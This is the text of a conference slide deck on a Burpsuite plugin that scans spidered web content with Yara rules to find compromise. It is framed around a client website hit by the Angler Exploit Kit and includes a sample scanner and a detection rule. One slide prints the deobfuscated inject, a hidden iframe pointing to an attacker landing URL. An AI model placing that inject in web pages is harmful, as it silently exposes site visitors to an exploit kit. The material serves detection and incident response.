Burpsuite / Yara Integration
Ian Duffy
Polito, Inc.
@politoinc
Introduction
• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Roadmap
• Questions
Who am I?
• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing (traditional
and web application) as well as malware
analysis
• Current duties involve malware analysis and
threat hunting
Burpsuite
• Burpsuite is a MITM proxy tool for viewing,
intercepting, modifying, and transmitting
HTTP(S) requests and responses.
• Allows the user to view all web content down
to the byte level, to include static pages,
JavaScript, JSON, WebSockets, and much
more.
• Includes several tools for assessing the
security of web applications
BurpSuite
Yara
• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings,
binary / hexadecimal data, file offsets, and
file structure, so that pattern matching rules
can be written against them
• Rules can be run against one or many files or
data streams in order to find matches
Yara Rules Example
Case Study
• Client contacts Polito and says that their IT
department is getting phone calls stating that
their website is causing “FireEye Alerts” and is
likely compromised
• Polito is asked to investigate and determine:
– Whether the site is actually compromised
– If so, scope, scale, and impact of the compromise
Case Study
• We request a tarball of the current webroot
folder and a dump of any backend CMS
databases
• In the meantime we begin spidering the
website using Burpsuite…
Case Study
Highly obfuscated JavaScript – interesting…
Case Study
• The obfuscated JavaScript is consistent with
the Angler Exploit Kit, which matches the
alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see
the following:
document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');
Case Study
Case Study
• Problems:
– How do we identify whether this EK landing page /
malicious JavaScript has been inserted into any
other pages on the site?
– How do we identify whether the attackers have
left themselves a back door?
Case Study
• Possible Solutions
– Wait for three days before client can get tarball of
their website uploaded to our SFTP server
– Manually search through online web content
– Write something to automate our searching
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and
Python
– Ruby requires JRuby
– Python requires Jython
• We decided to use Python to develop our Yara
integration for expedience
The Plugin…
• Burpsuite specifies several interfaces for
performing various tasks
• Depending on what functionality we are trying to
implement, we must implement one or more of
those interfaces
• The interfaces specify methods that must be
implemented in order to handle events from the
Burpsuite UI
The Plugin…
• Each of the interfaces requires specific
methods be implemented
– IBurpExtender requires a method named
registerExtenderCallbacks
– ITab requires methods named getTabCaption and
getUIComponent
• Documentation for the interfaces is available
at:
– https://portswigger.net/burp/extender/api/index.html
The Plugin…
• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as
much of the content as possible
– User right-clicks on website in Burp UI and selects
“Scan with Yara”
– Yara is used to scan the content of the web
requests and responses
– Results displayed to user in a Tab
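The "Scan with Yara" flow above, as an added example that is not the Yara-Scanner plugin's own code: it runs in plain CPython, with the Burp and yara-python pieces replaced by assumptions (constructed site-map items, and a pure-Python stand-in for a Yara rule using `all of them`); the rule text, URLs and CSS class name are constructed placeholders.

```python
import re

# Constructed sample of what Burp's site map holds after spidering: (URL, raw
# response bytes). The second response carries the hidden-iframe pattern seen in
# the deobfuscated inject; host and class name are placeholders, not the real ones.
SAMPLE_ITEMS = [
    ("http://example.test/index.html",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Welcome</body></html>"),
    ("http://example.test/news.html",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>News<script>"
     b"document.write('<style>.abcd{position:absolute;top:-907px;width:300px;}</style>"
     b"<div class=\"abcd\"><iframe src=\"http://placeholder.invalid/x\"></iframe></div>');"
     b"</script></body></html>"),
    ("http://example.test/style.css",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/css\r\n\r\nbody{position:absolute;top:-907px}"),
]

# Constructed Yara source for the same detection, usable with yara.compile(source=...).
HIDDEN_IFRAME_RULE = r'''
rule hidden_iframe_injection {
    strings:
        $write = "document.write("
        $pos   = "position:absolute"
        $top   = /top:-[0-9]{3,}px/
        $frame = "<iframe"
    condition:
        all of them
}
'''

# Pure-Python stand-in for that rule so the example runs without yara-python:
# rule name -> regexes that must all occur in the data (Yara's "all of them").
SIMPLE_RULES = {
    "hidden_iframe_injection": [rb"document\.write\(", rb"position:absolute",
                                rb"top:-[0-9]{3,}px", rb"<iframe"],
}

def response_body(raw):
    """Bytes after the header block of a raw HTTP response; in Burp this is the
    slice starting at IResponseInfo.getBodyOffset()."""
    sep = raw.find(b"\r\n\r\n")
    return raw[sep + 4:] if sep != -1 else raw

def simple_matcher(data, rules=SIMPLE_RULES):
    """Names of rules whose patterns all appear in data."""
    return [name for name, pats in rules.items()
            if all(re.search(p, data) for p in pats)]

def yara_matcher(compiled):
    """Wrap compiled yara-python rules in the same callable shape (assumes yara-python)."""
    return lambda data: [m.rule for m in compiled.match(data=data)]

def scan_items(items, matcher=simple_matcher):
    """One (url, rule) row per hit: the rows a results tab would list."""
    return [(url, rule) for url, raw in items for rule in matcher(response_body(raw))]
```

The CSS response contains the off-screen positioning but no `document.write` or `<iframe>`, so only news.html is reported.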
Jython
• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java
objects, and call their methods via Python
code:
Jython
• Java objects are instantiated by calling a
constructor method with the same name as
the class
– No “new” keyword like in Java
– Parameters to the constructors are the same
• Once instantiated, class objects can be used
just as with Java
Demonstration
Live demo time – this always works!
Future Roadmap
• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– Multiple rules files
• Your thoughts and feature requests are most
welcome!
Grab a Copy
• Plugin is available on our GitHub site:
• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to
ian@politoinc.com
Questions?
Ian Duffy
Polito, Inc.
@politoinc
www.politoinc.com
Thank You!